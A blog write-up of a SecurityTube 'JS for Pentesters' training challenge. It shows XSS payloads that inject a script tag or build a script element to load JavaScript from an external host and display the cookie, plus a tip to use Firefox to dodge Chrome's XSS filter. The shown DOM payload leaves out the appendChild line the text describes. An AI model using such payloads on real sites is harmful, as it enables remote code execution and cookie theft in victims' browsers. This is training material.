XSS - Include external js using js: JS for Pentesters task 10 write up

Oct 29, 2014 • jsp, javascript, xss, security-tube

Writeup for task-10 of the JS for pentesters series by security-tube - Include external js

In the last write up, we saw how we can include an external JavaScript file and execute it via XSS. This is a very similar challenge but a bit different:

JS for Pentesters task 10

Our objective is to Include the JS file available at http://demofilespa.s3.amazonaws.com/jfptest.js into that page. This time things are a bit different. Usually we include the JavaScript contents inside a <script> tag but here in the challenge, what ever we type in, it will goes inside a <script> tag so this time, executing a script is a bit difficult.  A very simple way to complete this challenge is to add a closing </script> tag and then reopen a new script tag which contains our file:

   </script><script src="http://demofilespa.s3.amazonaws.com/jfptest.js"></script>

But while explaining about the challenge, vivek has specifically mentioned that we shouldn’t use this method and should accomplish this task in some other way. So let us see how can we do this in another way. Basically what we need to do is to create a new script element which points to the external JavaScript file and we should add the newly created script element to the head of the HTML document so that it will execute successfully. So the payload looks like this:

    var script = document.createElement("script");
    script.type = "text/javascript";
    script.src = "http://demofilespa.s3.amazonaws.com/jfptest.js";

Like we said above, what we did is that first we created a new script element. Then added some attributes to the newly created elements and pointed the src to http://demofilespa.s3.amazonaws.com/jfptest.js , where out JavaScript file is located. Then we used the appendChild() function in JavaScript to append this script at the end of the** </head>** tag. After a successful run, you can see the cookie in an alert box.


1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox because Google chrome has inbuilt XSS stopper which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So its strongly recommended to use Firefox instead of chrome.

We hope that you really liked this challenge. If there is anything you didn’t understand or wanted to get more clarity, please comment down and we are more than happy to help. Also, if you get a better way of solving the challenge, please share it with us and we are happy to learn from our readers too. Happy pentesting..

Anirudh Anand

Security Engineer @CRED | Web Application Security ♥ | Google, Microsoft, Zendesk, Gitlab Hall of Fames | Blogger | CTF lover - @teambi0s | Certs - eWDP, OSCP